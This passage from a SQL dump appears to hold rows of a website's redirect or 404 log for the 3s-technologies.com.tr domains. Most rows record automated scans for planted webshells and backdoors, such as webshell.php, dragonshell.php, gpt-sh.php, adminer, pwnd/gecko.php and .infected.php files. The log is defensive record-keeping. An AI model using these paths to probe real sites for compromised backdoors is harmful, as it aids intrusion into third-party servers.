15:12:20','0000-00-00 00:00:00',301),(59768,'http://www.3s-technologies.com.tr/tr/public/ws49.php',NULL,'','',1,0,'2026-03-22 15:12:22','0000-00-00 00:00:00',301),(59769,'http://www.3s-technologies.com.tr/tr/sa.php7',NULL,'','',2,0,'2026-03-22 15:12:23','0000-00-00 00:00:00',301),(59770,'http://www.3s-technologies.com.tr/tr/abrand.php',NULL,'','',2,0,'2026-03-22 15:12:30','0000-00-00 00:00:00',301),(59771,'http://www.3s-technologies.com.tr/tr/8573.php',NULL,'','',7,0,'2026-03-22 15:12:30','0000-00-00 00:00:00',301),(59772,'http://www.3s-technologies.com.tr/tr/hplfuns.php',NULL,'','',10,0,'2026-03-22 15:12:37','0000-00-00 00:00:00',301),(59773,'http://www.3s-technologies.com.tr/tr/wp-blog-header.php',NULL,'','',6,0,'2026-03-22 15:12:48','0000-00-00 00:00:00',301),(59774,'http://www.3s-technologies.com.tr/tr/ws83.php',NULL,'','',3,0,'2026-03-22 15:12:53','0000-00-00 00:00:00',301),(59775,'http://www.3s-technologies.com.tr/tr/drhunthq.php',NULL,'','',1,0,'2026-03-22 15:12:54','0000-00-00 00:00:00',301),(59776,'http://www.3s-technologies.com.tr/tr/ws81.php',NULL,'','',3,0,'2026-03-22 15:12:57','0000-00-00 00:00:00',301),(59777,'http://www.3s-technologies.com.tr/tr/byypas.php',NULL,'','',7,0,'2026-03-22 15:12:58','0000-00-00 00:00:00',301),(59778,'http://www.3s-technologies.com.tr/tr/tx78.php',NULL,'','',3,0,'2026-03-22 15:13:05','0000-00-00 00:00:00',301),(59779,'http://www.3s-technologies.com.tr/tr/ws49.php',NULL,'','',4,0,'2026-03-22 15:13:06','0000-00-00 00:00:00',301),(59780,'http://www.3s-technologies.com.tr/tr/public/file.php',NULL,'','',2,0,'2026-03-22 15:13:08','0000-00-00 00:00:00',301),(59781,'http://3s-technologies.com.tr/tr/x1da.php',NULL,'','',20,0,'2026-03-22 23:12:16','0000-00-00 00:00:00',301),(59782,'http://3s-technologies.com.tr/tr/apps/admin/view/default/layui/css/layui.css',NULL,'http://3s-technologies.com.tr','',1,0,'2026-03-23 22:57:43','0000-00-00 00:00:00',301),(59783,'http://mail.3s-technologies.com.tr/tr/buc.php',NULL,'','',11,0,'2026-03-23 23:42:37','0000-00-00 00:00:00',301),(59784,'http://mail.3s-technologies.com.tr/tr/xfun.php',NULL,'','',5,0,'2026-03-23 23:42:41','0000-00-00 00:00:00',301),(59785,'http://mail.3s-technologies.com.tr/tr/ws85.php',NULL,'','',24,0,'2026-03-23 23:42:43','0000-00-00 00:00:00',301),(59786,'http://mail.3s-technologies.com.tr/tr/cap.php',NULL,'','',21,0,'2026-03-23 23:42:44','0000-00-00 00:00:00',301),(59787,'http://mail.3s-technologies.com.tr/tr/dass.php',NULL,'','',27,0,'2026-03-23 23:42:45','0000-00-00 00:00:00',301),(59788,'http://3s-technologies.com.tr/tr/buc.php',NULL,'','',12,0,'2026-03-24 01:43:49','0000-00-00 00:00:00',301),(59789,'http://3s-technologies.com.tr/tr/xfun.php',NULL,'','',11,0,'2026-03-24 01:43:52','0000-00-00 00:00:00',301),(59790,'http://3s-technologies.com.tr/tr/ws85.php',NULL,'','',30,0,'2026-03-24 01:43:53','0000-00-00 00:00:00',301),(59791,'http://3s-technologies.com.tr/tr/dass.php',NULL,'','',52,0,'2026-03-24 01:43:55','0000-00-00 00:00:00',301),(59792,'https://3s-technologies.com.tr/tr/user/login',NULL,'https://3s-technologies.com.tr/user/login','',18,0,'2026-03-24 08:43:45','0000-00-00 00:00:00',301),(59793,'https://3s-technologies.com.tr/tr/register',NULL,'https://3s-technologies.com.tr/register','',18,0,'2026-03-24 08:43:48','0000-00-00 00:00:00',301),(59794,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/ultra.php',NULL,'','',3,0,'2026-03-24 18:02:18','0000-00-00 00:00:00',301),(59795,'http://3s-technologies.com.tr/tr/adminer-3.3.4-cs.php',NULL,'','',3,0,'2026-03-24 18:02:18','0000-00-00 00:00:00',301),(59796,'http://3s-technologies.com.tr/tr/fiyhxaae.php',NULL,'','',3,0,'2026-03-24 18:02:20','0000-00-00 00:00:00',301),(59797,'http://3s-technologies.com.tr/tr/tx22.php',NULL,'','',5,0,'2026-03-25 08:43:42','0000-00-00 00:00:00',301),(59798,'http://3s-technologies.com.tr/tr/fw/34.php',NULL,'','',5,0,'2026-03-25 08:43:43','0000-00-00 00:00:00',301),(59799,'http://3s-technologies.com.tr/tr/fw/faiyy.php',NULL,'','',5,0,'2026-03-25 08:43:44','0000-00-00 00:00:00',301),(59800,'http://3s-technologies.com.tr/tr/abca.php',NULL,'','',5,0,'2026-03-25 08:43:45','0000-00-00 00:00:00',301),(59801,'http://3s-technologies.com.tr/tr/xl2024.php',NULL,'','',5,0,'2026-03-25 08:43:47','0000-00-00 00:00:00',301),(59802,'http://3s-technologies.com.tr/tr/fde.php',NULL,'','',5,0,'2026-03-25 08:43:48','0000-00-00 00:00:00',301),(59803,'http://3s-technologies.com.tr/tr/mjde.php',NULL,'','',5,0,'2026-03-25 08:43:49','0000-00-00 00:00:00',301),(59804,'http://3s-technologies.com.tr/tr/gin.php',NULL,'','',5,0,'2026-03-25 08:43:49','0000-00-00 00:00:00',301),(59805,'http://3s-technologies.com.tr/tr/bays.php',NULL,'','',5,0,'2026-03-25 08:43:51','0000-00-00 00:00:00',301),(59806,'http://3s-technologies.com.tr/tr/x0rg.php',NULL,'','',5,0,'2026-03-25 08:43:51','0000-00-00 00:00:00',301),(59807,'http://3s-technologies.com.tr/tr/dk.php',NULL,'','',5,0,'2026-03-25 08:43:52','0000-00-00 00:00:00',301),(59808,'http://3s-technologies.com.tr/tr/sace.php',NULL,'','',4,0,'2026-03-25 09:18:53','0000-00-00 00:00:00',301),(59809,'http://3s-technologies.com.tr/tr/north1.php',NULL,'','',10,0,'2026-03-25 09:18:54','0000-00-00 00:00:00',301),(59810,'http://3s-technologies.com.tr/tr/420.php',NULL,'','',2,0,'2026-03-25 09:18:55','0000-00-00 00:00:00',301),(59811,'http://3s-technologies.com.tr/tr/fine.php',NULL,'','',26,0,'2026-03-25 09:18:56','0000-00-00 00:00:00',301),(59812,'http://3s-technologies.com.tr/tr/bless13.php',NULL,'','',4,0,'2026-03-25 09:19:01','0000-00-00 00:00:00',301),(59813,'http://3s-technologies.com.tr/tr/hla.php',NULL,'','',4,0,'2026-03-25 09:20:09','0000-00-00 00:00:00',301),(59814,'http://3s-technologies.com.tr/tr/ew.php',NULL,'','',22,0,'2026-03-25 09:20:09','0000-00-00 00:00:00',301),(59815,'http://3s-technologies.com.tr/tr/zcsu.php',NULL,'','',5,0,'2026-03-25 12:37:51','0000-00-00 00:00:00',301),(59816,'http://3s-technologies.com.tr/tr/wp-cxs.php',NULL,'','',5,0,'2026-03-25 12:37:52','0000-00-00 00:00:00',301),(59817,'http://3s-technologies.com.tr/tr/wp-scanner.php',NULL,'','',6,0,'2026-03-25 12:37:53','0000-00-00 00:00:00',301),(59818,'http://mail.3s-technologies.com.tr/tr/xocx.php',NULL,'','',2,0,'2026-03-25 20:50:56','0000-00-00 00:00:00',301),(59819,'http://mail.3s-technologies.com.tr/tr/sace.php',NULL,'','',2,0,'2026-03-25 20:50:57','0000-00-00 00:00:00',301),(59820,'http://mail.3s-technologies.com.tr/tr/wp-zx.php',NULL,'','',2,0,'2026-03-25 20:50:58','0000-00-00 00:00:00',301),(59821,'http://mail.3s-technologies.com.tr/tr/north1.php',NULL,'','',5,0,'2026-03-25 20:50:58','0000-00-00 00:00:00',301),(59822,'http://mail.3s-technologies.com.tr/tr/420.php',NULL,'','',1,0,'2026-03-25 20:50:59','0000-00-00 00:00:00',301),(59823,'http://mail.3s-technologies.com.tr/tr/fine.php',NULL,'','',11,0,'2026-03-25 20:50:59','0000-00-00 00:00:00',301),(59824,'http://mail.3s-technologies.com.tr/tr/zample.php',NULL,'','',7,0,'2026-03-25 20:51:00','0000-00-00 00:00:00',301),(59825,'http://mail.3s-technologies.com.tr/tr/read.php',NULL,'','',4,0,'2026-03-25 20:51:00','0000-00-00 00:00:00',301),(59826,'http://mail.3s-technologies.com.tr/tr/bless13.php',NULL,'','',2,0,'2026-03-25 20:51:03','0000-00-00 00:00:00',301),(59827,'http://mail.3s-technologies.com.tr/tr/hla.php',NULL,'','',2,0,'2026-03-25 20:51:58','0000-00-00 00:00:00',301),(59828,'http://mail.3s-technologies.com.tr/tr/ew.php',NULL,'','',9,0,'2026-03-25 20:51:59','0000-00-00 00:00:00',301),(59829,'http://mail.3s-technologies.com.tr/tr/x1da.php',NULL,'','',7,0,'2026-03-25 20:52:12','0000-00-00 00:00:00',301),(59830,'http://www.3s-technologies.com.tr/tr/rithin.php',NULL,'','',4,0,'2026-03-25 23:28:06','0000-00-00 00:00:00',301),(59831,'http://www.3s-technologies.com.tr/tr/uuu.php',NULL,'','',6,0,'2026-03-25 23:28:11','0000-00-00 00:00:00',301),(59832,'http://www.3s-technologies.com.tr/tr/bjfl.php',NULL,'','',2,0,'2026-03-25 23:28:21','0000-00-00 00:00:00',301),(59833,'http://www.3s-technologies.com.tr/tr/cap.php',NULL,'','',6,0,'2026-03-25 23:28:26','0000-00-00 00:00:00',301),(59834,'http://www.3s-technologies.com.tr/tr/ws85.php',NULL,'','',3,0,'2026-03-25 23:28:34','0000-00-00 00:00:00',301),(59835,'http://www.3s-technologies.com.tr/tr/buc.php',NULL,'','',2,0,'2026-03-25 23:28:35','0000-00-00 00:00:00',301),(59836,'http://www.3s-technologies.com.tr/tr/torsa1.php',NULL,'','',3,0,'2026-03-25 23:28:37','0000-00-00 00:00:00',301),(59837,'http://3s-technologies.com.tr/tr/adminlite/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2026-03-26 05:37:30','0000-00-00 00:00:00',301),(59838,'http://mail.3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/ultra.php',NULL,'','',1,0,'2026-03-26 06:04:57','0000-00-00 00:00:00',301),(59839,'http://mail.3s-technologies.com.tr/tr/adminer-3.3.4-cs.php',NULL,'','',1,0,'2026-03-26 06:04:58','0000-00-00 00:00:00',301),(59840,'http://mail.3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/class-wp-sitemaps-data.php',NULL,'','',1,0,'2026-03-26 06:05:00','0000-00-00 00:00:00',301),(59841,'http://mail.3s-technologies.com.tr/tr/fiyhxaae.php',NULL,'','',1,0,'2026-03-26 06:05:01','0000-00-00 00:00:00',301),(59842,'http://3s-technologies.com.tr/tr/sodas.php',NULL,'','',4,0,'2026-03-26 07:53:59','0000-00-00 00:00:00',301),(59843,'http://3s-technologies.com.tr/tr/zaz.php',NULL,'','',1,0,'2026-03-26 07:54:00','0000-00-00 00:00:00',301),(59844,'http://3s-technologies.com.tr/tr/bm.php',NULL,'','',1,0,'2026-03-26 07:54:01','0000-00-00 00:00:00',301),(59845,'http://3s-technologies.com.tr/tr/torsa.php',NULL,'','',7,0,'2026-03-26 07:54:02','0000-00-00 00:00:00',301),(59846,'http://mail.3s-technologies.com.tr/tr/cgi-bin/admin.php',NULL,'','',2,0,'2026-03-26 18:38:16','0000-00-00 00:00:00',301),(59847,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/pwnd/gecko.php',NULL,'','',7,0,'2026-03-26 18:38:17','0000-00-00 00:00:00',301),(59848,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/lock.php',NULL,'','',7,0,'2026-03-26 18:38:17','0000-00-00 00:00:00',301),(59849,'http://mail.3s-technologies.com.tr/tr/cgi-bin/xmrlpc.php',NULL,'','',2,0,'2026-03-26 18:38:18','0000-00-00 00:00:00',301),(59850,'http://mail.3s-technologies.com.tr/tr/assets/admin.php',NULL,'','',13,0,'2026-03-26 18:38:19','0000-00-00 00:00:00',301),(59851,'http://mail.3s-technologies.com.tr/tr/cgi-bin/moon.php',NULL,'','',2,0,'2026-03-26 18:38:20','0000-00-00 00:00:00',301),(59852,'http://mail.3s-technologies.com.tr/tr/ws47.php',NULL,'','',3,0,'2026-03-26 22:48:08','0000-00-00 00:00:00',301),(59853,'http://mail.3s-technologies.com.tr/tr/vvvb.php',NULL,'','',3,0,'2026-03-26 22:48:08','0000-00-00 00:00:00',301),(59854,'http://mail.3s-technologies.com.tr/tr/zcsu.php',NULL,'','',3,0,'2026-03-26 22:48:09','0000-00-00 00:00:00',301),(59855,'http://mail.3s-technologies.com.tr/tr/wp-cxs.php',NULL,'','',3,0,'2026-03-26 22:48:10','0000-00-00 00:00:00',301),(59856,'http://mail.3s-technologies.com.tr/tr/wp-scanner.php',NULL,'','',3,0,'2026-03-26 22:48:11','0000-00-00 00:00:00',301),(59857,'http://mail.3s-technologies.com.tr/tr/tbute.php',NULL,'','',3,0,'2026-03-26 22:48:16','0000-00-00 00:00:00',301),(59858,'http://mail.3s-technologies.com.tr/tr/r3grt7.php',NULL,'','',3,0,'2026-03-26 22:48:17','0000-00-00 00:00:00',301),(59859,'http://mail.3s-technologies.com.tr/tr/ws82.php',NULL,'','',10,0,'2026-03-26 22:48:22','0000-00-00 00:00:00',301),(59860,'http://mail.3s-technologies.com.tr/tr/ws50.php',NULL,'','',3,0,'2026-03-26 22:48:25','0000-00-00 00:00:00',301),(59861,'http://mail.3s-technologies.com.tr/tr/ws44.php',NULL,'','',3,0,'2026-03-26 22:48:25','0000-00-00 00:00:00',301),(59862,'http://mail.3s-technologies.com.tr/tr/ws42.php',NULL,'','',3,0,'2026-03-26 22:48:27','0000-00-00 00:00:00',301),(59863,'http://mail.3s-technologies.com.tr/tr/ws40.php',NULL,'','',3,0,'2026-03-26 22:48:28','0000-00-00 00:00:00',301),(59864,'http://mail.3s-technologies.com.tr/tr/vwxbi.php',NULL,'','',3,0,'2026-03-26 22:48:29','0000-00-00 00:00:00',301),(59865,'http://mail.3s-technologies.com.tr/tr/cvz.php',NULL,'','',3,0,'2026-03-26 22:48:31','0000-00-00 00:00:00',301),(59866,'http://mail.3s-technologies.com.tr/tr/n1gio.php',NULL,'','',3,0,'2026-03-26 22:48:40','0000-00-00 00:00:00',301),(59867,'http://mail.3s-technologies.com.tr/tr/pldk1.php',NULL,'','',3,0,'2026-03-26 22:48:41','0000-00-00 00:00:00',301),(59868,'http://mail.3s-technologies.com.tr/tr/llb1j.php',NULL,'','',3,0,'2026-03-26 22:48:42','0000-00-00 00:00:00',301),(59869,'http://mail.3s-technologies.com.tr/tr/jezdu.php',NULL,'','',3,0,'2026-03-26 22:48:42','0000-00-00 00:00:00',301),(59870,'http://mail.3s-technologies.com.tr/tr/bfukk.php',NULL,'','',3,0,'2026-03-26 22:48:43','0000-00-00 00:00:00',301),(59871,'http://mail.3s-technologies.com.tr/tr/opvq6.php',NULL,'','',3,0,'2026-03-26 22:48:44','0000-00-00 00:00:00',301),(59872,'http://mail.3s-technologies.com.tr/tr/q73bo.php',NULL,'','',3,0,'2026-03-26 22:48:44','0000-00-00 00:00:00',301),(59873,'http://mail.3s-technologies.com.tr/tr/rmpoa.php',NULL,'','',3,0,'2026-03-26 22:48:45','0000-00-00 00:00:00',301),(59874,'http://mail.3s-technologies.com.tr/tr/lanou.php',NULL,'','',3,0,'2026-03-26 22:48:58','0000-00-00 00:00:00',301),(59875,'http://mail.3s-technologies.com.tr/tr/schal.php',NULL,'','',3,0,'2026-03-26 22:49:00','0000-00-00 00:00:00',301),(59876,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/wta.php',NULL,'','',3,0,'2026-03-26 22:49:01','0000-00-00 00:00:00',301),(59877,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/dtyh.php',NULL,'','',3,0,'2026-03-26 22:49:02','0000-00-00 00:00:00',301),(59878,'http://mail.3s-technologies.com.tr/tr/dtyh.php',NULL,'','',3,0,'2026-03-26 22:49:02','0000-00-00 00:00:00',301),(59879,'http://mail.3s-technologies.com.tr/tr/gpt-sh.php',NULL,'','',16,0,'2026-03-26 22:49:05','0000-00-00 00:00:00',301),(59880,'http://mail.3s-technologies.com.tr/tr/wp-true.php',NULL,'','',3,0,'2026-03-26 22:49:06','0000-00-00 00:00:00',301),(59881,'http://mail.3s-technologies.com.tr/tr/tx88.php',NULL,'','',3,0,'2026-03-26 22:49:07','0000-00-00 00:00:00',301),(59882,'http://mail.3s-technologies.com.tr/tr/uang.php',NULL,'','',3,0,'2026-03-26 22:49:10','0000-00-00 00:00:00',301),(59883,'http://mail.3s-technologies.com.tr/tr/wp3.php',NULL,'','',6,0,'2026-03-26 22:49:10','0000-00-00 00:00:00',301),(59884,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/absorption.php',NULL,'','',3,0,'2026-03-26 22:49:11','0000-00-00 00:00:00',301),(59885,'http://mail.3s-technologies.com.tr/tr/wglum1.php',NULL,'','',9,0,'2026-03-26 22:49:12','0000-00-00 00:00:00',301),(59886,'http://mail.3s-technologies.com.tr/tr/yuzuru1.php',NULL,'','',16,0,'2026-03-26 22:49:13','0000-00-00 00:00:00',301),(59887,'http://mail.3s-technologies.com.tr/tr/wdone1.php',NULL,'','',5,0,'2026-03-26 22:49:14','0000-00-00 00:00:00',301),(59888,'http://mail.3s-technologies.com.tr/tr/sodas.php',NULL,'','',2,0,'2026-03-27 01:22:23','0000-00-00 00:00:00',301),(59889,'http://mail.3s-technologies.com.tr/tr/zaz.php',NULL,'','',1,0,'2026-03-27 01:22:24','0000-00-00 00:00:00',301),(59890,'http://mail.3s-technologies.com.tr/tr/bm.php',NULL,'','',1,0,'2026-03-27 01:22:25','0000-00-00 00:00:00',301),(59891,'http://mail.3s-technologies.com.tr/tr/torsa.php',NULL,'','',1,0,'2026-03-27 01:22:26','0000-00-00 00:00:00',301),(59892,'http://3s-technologies.com.tr/tr/zks.php',NULL,'','',1,0,'2026-03-27 08:18:13','0000-00-00 00:00:00',301),(59893,'http://3s-technologies.com.tr/tr/xbc.php',NULL,'','',1,0,'2026-03-27 08:18:14','0000-00-00 00:00:00',301),(59894,'http://3s-technologies.com.tr/tr/b1ack2.php',NULL,'','',1,0,'2026-03-27 08:18:14','0000-00-00 00:00:00',301),(59895,'http://3s-technologies.com.tr/tr/ne2026.php',NULL,'','',10,0,'2026-03-27 08:18:15','0000-00-00 00:00:00',301),(59896,'http://3s-technologies.com.tr/tr/duea.php',NULL,'','',1,0,'2026-03-27 08:18:15','0000-00-00 00:00:00',301),(59897,'http://3s-technologies.com.tr/tr/no18.php',NULL,'','',38,0,'2026-03-27 08:18:16','0000-00-00 00:00:00',301),(59898,'http://3s-technologies.com.tr/tr/feed-rsss.php',NULL,'','',1,0,'2026-03-27 15:15:44','0000-00-00 00:00:00',301),(59899,'http://3s-technologies.com.tr/tr/webshell.php',NULL,'','',1,0,'2026-03-27 15:15:45','0000-00-00 00:00:00',301),(59900,'http://3s-technologies.com.tr/tr/wp-css.php',NULL,'','',2,0,'2026-03-27 15:15:46','0000-00-00 00:00:00',301),(59901,'http://3s-technologies.com.tr/tr/qiuerhhrkqi.php',NULL,'','',1,0,'2026-03-27 15:15:47','0000-00-00 00:00:00',301),(59902,'http://3s-technologies.com.tr/tr/rciobhcig6.php',NULL,'','',1,0,'2026-03-27 15:15:48','0000-00-00 00:00:00',301),(59903,'http://3s-technologies.com.tr/tr/class-wp-font-face.php',NULL,'','',1,0,'2026-03-27 15:15:50','0000-00-00 00:00:00',301),(59904,'http://3s-technologies.com.tr/tr/plugin-install.php.infected.php',NULL,'','',1,0,'2026-03-27 15:15:51','0000-00-00 00:00:00',301),(59905,'http://3s-technologies.com.tr/tr/theme-install.php.infected.php',NULL,'','',1,0,'2026-03-27 15:15:54','0000-00-00 00:00:00',301),(59906,'http://3s-technologies.com.tr/tr/gmail.php',NULL,'','',1,0,'2026-03-27 15:15:54','0000-00-00 00:00:00',301),(59907,'http://3s-technologies.com.tr/tr/babu.php',NULL,'','',1,0,'2026-03-27 15:15:55','0000-00-00 00:00:00',301),(59908,'http://3s-technologies.com.tr/tr/class-wp-font-library.php',NULL,'','',1,0,'2026-03-27 15:15:56','0000-00-00 00:00:00',301),(59909,'http://3s-technologies.com.tr/tr/yym123wx.php',NULL,'','',1,0,'2026-03-27 15:15:59','0000-00-00 00:00:00',301),(59910,'http://3s-technologies.com.tr/tr/b1ack.php',NULL,'','',1,0,'2026-03-27 15:16:00','0000-00-00 00:00:00',301),(59911,'http://3s-technologies.com.tr/tr/embed-database.php',NULL,'','',1,0,'2026-03-27 15:16:01','0000-00-00 00:00:00',301),(59912,'http://3s-technologies.com.tr/tr/dfylbgoahqt.php',NULL,'','',1,0,'2026-03-27 15:16:02','0000-00-00 00:00:00',301),(59913,'http://3s-technologies.com.tr/tr/abruzi.php',NULL,'','',1,0,'2026-03-27 15:16:03','0000-00-00 00:00:00',301),(59914,'http://3s-technologies.com.tr/tr/programa_apoyo_editoriales.php',NULL,'','',1,0,'2026-03-27 15:16:03','0000-00-00 00:00:00',301),(59915,'http://3s-technologies.com.tr/tr/pe9rsn.php',NULL,'','',1,0,'2026-03-27 15:16:04','0000-00-00 00:00:00',301),(59916,'http://3s-technologies.com.tr/tr/metamers.php',NULL,'','',1,0,'2026-03-27 15:16:05','0000-00-00 00:00:00',301),(59917,'http://3s-technologies.com.tr/tr/class-wp-font-utils.php',NULL,'','',1,0,'2026-03-27 15:16:06','0000-00-00 00:00:00',301),(59918,'http://3s-technologies.com.tr/tr/hmsaozzm.php',NULL,'','',1,0,'2026-03-27 15:16:08','0000-00-00 00:00:00',301),(59919,'http://3s-technologies.com.tr/tr/sjvxnsen.php',NULL,'','',1,0,'2026-03-27 15:16:09','0000-00-00 00:00:00',301),(59920,'http://3s-technologies.com.tr/tr/fungsi.php',NULL,'','',1,0,'2026-03-27 15:16:11','0000-00-00 00:00:00',301),(59921,'http://3s-technologies.com.tr/tr/pylse9o2gwv.php',NULL,'','',1,0,'2026-03-27 15:16:13','0000-00-00 00:00:00',301),(59922,'http://3s-technologies.com.tr/tr/tjbahadm.php',NULL,'','',1,0,'2026-03-27 15:16:13','0000-00-00 00:00:00',301),(59923,'http://3s-technologies.com.tr/tr/rebaxbqw.php',NULL,'','',1,0,'2026-03-27 15:16:17','0000-00-00 00:00:00',301),(59924,'http://3s-technologies.com.tr/tr/aiojtbvv.php',NULL,'','',1,0,'2026-03-27 15:16:21','0000-00-00 00:00:00',301),(59925,'http://3s-technologies.com.tr/tr/surgezkj.php',NULL,'','',1,0,'2026-03-27 15:16:22','0000-00-00 00:00:00',301),(59926,'http://3s-technologies.com.tr/tr/duqyhfnlbcr.php',NULL,'','',1,0,'2026-03-27 15:16:24','0000-00-00 00:00:00',301),(59927,'http://3s-technologies.com.tr/tr/site2.php',NULL,'','',1,0,'2026-03-27 15:16:26','0000-00-00 00:00:00',301),(59928,'http://3s-technologies.com.tr/tr/lyns.php',NULL,'','',1,0,'2026-03-27 15:16:26','0000-00-00 00:00:00',301),(59929,'http://3s-technologies.com.tr/tr/class-wp-privacy-data-removal-requests-list-table-package.php',NULL,'','',1,0,'2026-03-27 15:16:50','0000-00-00 00:00:00',301),(59930,'http://3s-technologies.com.tr/tr/class-wp-customize-date-time-control.php',NULL,'','',1,0,'2026-03-27 15:16:51','0000-00-00 00:00:00',301),(59931,'http://3s-technologies.com.tr/tr/uvygonziqtx.php',NULL,'','',1,0,'2026-03-27 15:16:51','0000-00-00 00:00:00',301),(59932,'http://3s-technologies.com.tr/tr/233.php',NULL,'','',3,0,'2026-03-27 20:46:45','0000-00-00 00:00:00',301),(59933,'http://3s-technologies.com.tr/tr/unloathness.php',NULL,'','',5,0,'2026-03-27 20:46:52','0000-00-00 00:00:00',301),(59934,'http://3s-technologies.com.tr/tr/multirole.php',NULL,'','',4,0,'2026-03-27 20:46:57','0000-00-00 00:00:00',301),(59935,'http://3s-technologies.com.tr/tr/help/crnpwfiu.php',NULL,'','',3,0,'2026-03-27 20:47:10','0000-00-00 00:00:00',301),(59936,'http://3s-technologies.com.tr/tr/public/ws38.php',NULL,'','',1,0,'2026-03-27 20:47:14','0000-00-00 00:00:00',301),(59937,'http://3s-technologies.com.tr/tr/wssw.php',NULL,'','',1,0,'2026-03-27 20:47:20','0000-00-00 00:00:00',301),(59938,'http://3s-technologies.com.tr/tr/ws73.php',NULL,'','',8,0,'2026-03-27 20:47:21','0000-00-00 00:00:00',301),(59939,'http://3s-technologies.com.tr/tr/bhm.php',NULL,'','',11,0,'2026-03-27 20:47:26','0000-00-00 00:00:00',301),(59940,'http://3s-technologies.com.tr/tr/lwvwpmg.php',NULL,'','',1,0,'2026-03-27 20:47:31','0000-00-00 00:00:00',301),(59941,'http://3s-technologies.com.tr/tr/zsaow.php',NULL,'','',1,0,'2026-03-27 20:47:36','0000-00-00 00:00:00',301),(59942,'http://3s-technologies.com.tr/tr/gaewowp.php',NULL,'','',1,0,'2026-03-27 20:47:46','0000-00-00 00:00:00',301),(59943,'http://3s-technologies.com.tr/tr/z3ki.php',NULL,'','',1,0,'2026-03-27 20:47:51','0000-00-00 00:00:00',301),(59944,'http://3s-technologies.com.tr/tr/class-wp-l10n-cache.php',NULL,'','',3,0,'2026-03-27 20:48:07','0000-00-00 00:00:00',301),(59945,'http://3s-technologies.com.tr/tr/congeree.php',NULL,'','',3,0,'2026-03-27 20:48:22','0000-00-00 00:00:00',301),(59946,'http://3s-technologies.com.tr/tr/enum.php',NULL,'','',1,0,'2026-03-27 20:48:23','0000-00-00 00:00:00',301),(59947,'http://mail.3s-technologies.com.tr/tr/ws87.php',NULL,'','',12,0,'2026-03-28 00:50:13','0000-00-00 00:00:00',301),(59948,'http://mail.3s-technologies.com.tr/tr/ne2026.php',NULL,'','',3,0,'2026-03-28 00:50:42','0000-00-00 00:00:00',301),(59949,'http://mail.3s-technologies.com.tr/tr/green.php',NULL,'','',11,0,'2026-03-28 00:50:48','0000-00-00 00:00:00',301),(59950,'http://mail.3s-technologies.com.tr/tr/wxfyf.php',NULL,'','',3,0,'2026-03-28 00:51:03','0000-00-00 00:00:00',301),(59951,'http://mail.3s-technologies.com.tr/tr/sale.php',NULL,'','',3,0,'2026-03-28 00:51:06','0000-00-00 00:00:00',301),(59952,'http://mail.3s-technologies.com.tr/tr/ws73.php',NULL,'','',3,0,'2026-03-28 00:51:37','0000-00-00 00:00:00',301),(59953,'http://mail.3s-technologies.com.tr/tr/lowpr.php',NULL,'','',3,0,'2026-03-28 00:51:38','0000-00-00 00:00:00',301),(59954,'http://3s-technologies.com.tr/tr/190.php',NULL,'','',2,0,'2026-03-28 13:15:03','0000-00-00 00:00:00',301),(59955,'http://3s-technologies.com.tr/tr/wpb.php',NULL,'','',20,0,'2026-03-28 13:15:04','0000-00-00 00:00:00',301),(59956,'http://3s-technologies.com.tr/tr/ps78.php',NULL,'','',3,0,'2026-03-28 13:15:05','0000-00-00 00:00:00',301),(59957,'http://3s-technologies.com.tr/tr/about2.php',NULL,'','',6,0,'2026-03-28 13:16:09','0000-00-00 00:00:00',301),(59958,'http://3s-technologies.com.tr/tr/blurbs13.php',NULL,'','',2,0,'2026-03-28 13:16:42','0000-00-00 00:00:00',301),(59959,'http://3s-technologies.com.tr/tr/tbute.php',NULL,'','',2,0,'2026-03-28 15:57:48','0000-00-00 00:00:00',301),(59960,'http://3s-technologies.com.tr/tr/r3grt7.php',NULL,'','',2,0,'2026-03-28 15:57:49','0000-00-00 00:00:00',301),(59961,'http://3s-technologies.com.tr/tr/ws82.php',NULL,'','',15,0,'2026-03-28 15:57:58','0000-00-00 00:00:00',301),(59962,'http://3s-technologies.com.tr/tr/ws50.php',NULL,'','',2,0,'2026-03-28 15:58:01','0000-00-00 00:00:00',301),(59963,'http://3s-technologies.com.tr/tr/ws44.php',NULL,'','',2,0,'2026-03-28 15:58:02','0000-00-00 00:00:00',301),(59964,'http://3s-technologies.com.tr/tr/ws42.php',NULL,'','',3,0,'2026-03-28 15:58:03','0000-00-00 00:00:00',301),(59965,'http://3s-technologies.com.tr/tr/ws40.php',NULL,'','',3,0,'2026-03-28 15:58:04','0000-00-00 00:00:00',301),(59966,'http://3s-technologies.com.tr/tr/vwxbi.php',NULL,'','',2,0,'2026-03-28 15:58:05','0000-00-00 00:00:00',301),(59967,'http://3s-technologies.com.tr/tr/cvz.php',NULL,'','',2,0,'2026-03-28 15:58:08','0000-00-00 00:00:00',301),(59968,'http://3s-technologies.com.tr/tr/n1gio.php',NULL,'','',2,0,'2026-03-28 15:58:20','0000-00-00 00:00:00',301),(59969,'http://3s-technologies.com.tr/tr/pldk1.php',NULL,'','',2,0,'2026-03-28 15:58:20','0000-00-00 00:00:00',301),(59970,'http://3s-technologies.com.tr/tr/llb1j.php',NULL,'','',2,0,'2026-03-28 15:58:21','0000-00-00 00:00:00',301),(59971,'http://3s-technologies.com.tr/tr/jezdu.php',NULL,'','',2,0,'2026-03-28 15:58:22','0000-00-00 00:00:00',301),(59972,'http://3s-technologies.com.tr/tr/bfukk.php',NULL,'','',2,0,'2026-03-28 15:58:24','0000-00-00 00:00:00',301),(59973,'http://3s-technologies.com.tr/tr/opvq6.php',NULL,'','',2,0,'2026-03-28 15:58:25','0000-00-00 00:00:00',301),(59974,'http://3s-technologies.com.tr/tr/q73bo.php',NULL,'','',2,0,'2026-03-28 15:58:25','0000-00-00 00:00:00',301),(59975,'http://3s-technologies.com.tr/tr/rmpoa.php',NULL,'','',2,0,'2026-03-28 15:58:26','0000-00-00 00:00:00',301),(59976,'http://3s-technologies.com.tr/tr/dragonshell.php',NULL,'','',11,0,'2026-03-28 15:58:43','0000-00-00 00:00:00',301),(59977,'http://3s-technologies.com.tr/tr/lanou.php',NULL,'','',2,0,'2026-03-28 15:58:48','0000-00-00 